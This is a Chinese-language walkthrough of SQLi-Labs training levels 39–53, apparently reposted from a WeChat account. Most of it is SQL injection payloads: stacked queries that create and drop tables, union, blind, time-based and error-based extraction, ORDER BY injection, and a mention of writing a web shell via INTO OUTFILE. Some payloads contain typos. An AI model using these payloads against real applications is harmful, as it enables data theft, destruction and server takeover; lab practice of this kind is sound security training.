【SQLi_Labs】Stacked Injections

青年，青年！无论受怎样的挫折和打击，都要咬着牙关挺住，因为你们完全有机会重建生活；只要不灰心丧气，每一次挫折就只不过是通往新境界的一块普通绊脚石，而绝不会置人于死命。

Less-39

堆叠注入，成功创建test39数据表

1;create table test39 like users;%23

删除test39数据表

1;drop table test39;%23

再次查询就会有新建的表名

0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23

Less-40

1');create table test40 like users;%23

再次查询就会有新建的表名

0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23

Less-41

1;create table test41 like users;%23

再次查询就会有新建的表名

0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23

Less-42

password处无过滤

login_user=1&login_password=1'%3bcreate+table+test42+like+users%3b%23&mysubmit=Login

Less-43

password处无过滤

login_user=1&login_password=1')%3bcreate+table+test43+like+users%3b%23&mysubmit=Login

Less-44

login_user=1&login_password=1'%3bcreate+table+test44+like+users%3b%23&mysubmit=Login

Less-45

login_user=1&login_password=1')%3bcreate+table+test45+like+users%3b%23&mysubmit=Login

Less-46

order by注入

username、password均为列名，所以以下需要知道列名

?sort=if(1=1,username,password)

?sort=null,if(1=1,username,password)

?sort=(case when (1=1) then username else password end)

?sort=ifnull(null, username)

?sort=rand(1=1) //order by rand(1)/rand(0)两者返回不一样

?sort=(select 1 regexp if(1=1,1,0x00))

将1=1换成bool盲注的语句函数即可用于获取数据

sort=rand(ascii(database(),1))=115)

时间盲注

sort=1 and if(ascii(substr(database(),1,1))=116,0,sleep(5))

sort=(select if(substring(current,1,1)=char(115),benchmatrk(5000000,md5('1')),null) from (select database() as current) as tb1)

Bool 盲注

rand(ascii(left(database()),1))=115)

报错注入：

1%20or%20updatexml(1,concat(0x7e,(select%20user())),1)

updatexml(1,if(1=1,concat(0x7e,version()),2),1) (select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)))

procedure analyse 参数后注入

sort=1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)

into outfile参数:

id=1 into outfield "path"

上传网马，可以在后面加上lines terminated by 16进制转码的数据

Less-47

有'，可以用报错

1%27%20or%20updatexml(1,concat(0x7e,(select%20user())),1)%20--%20q

1'and (select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)))--+1'and (select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x)--+

也可以用时间盲注

1'and If(ascii(substr(database(),1,1))=115,0,sleep (5))--+

procedure analyse 参数后注入

1'procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)--+

Less-48

1 and If(ascii(substr(database(),1,1))>115,0,sleep (5))--+

sort=rand(ascii(left(database(),1))=115)

Less-49

1' and If(ascii(substr(database(),1,1))=115,0,sleep (5))--+

1' and (If(ascii(substr((select username from users where id=1),1,1))=68,0,sleep(5)))--+

Less-50

堆叠注入

1;create table test50 like users;%23

Less-51

1';create table test51 like users;%23

Less-52

1;create table test52 like users;%23

Less-53

1';create table test53 like users;%23

文笔生疏，措辞浅薄，望各位大佬不吝赐教，万分感谢。

原文始发于微信公众号（儒道易行）：【SQLi_Labs】Stacked Injections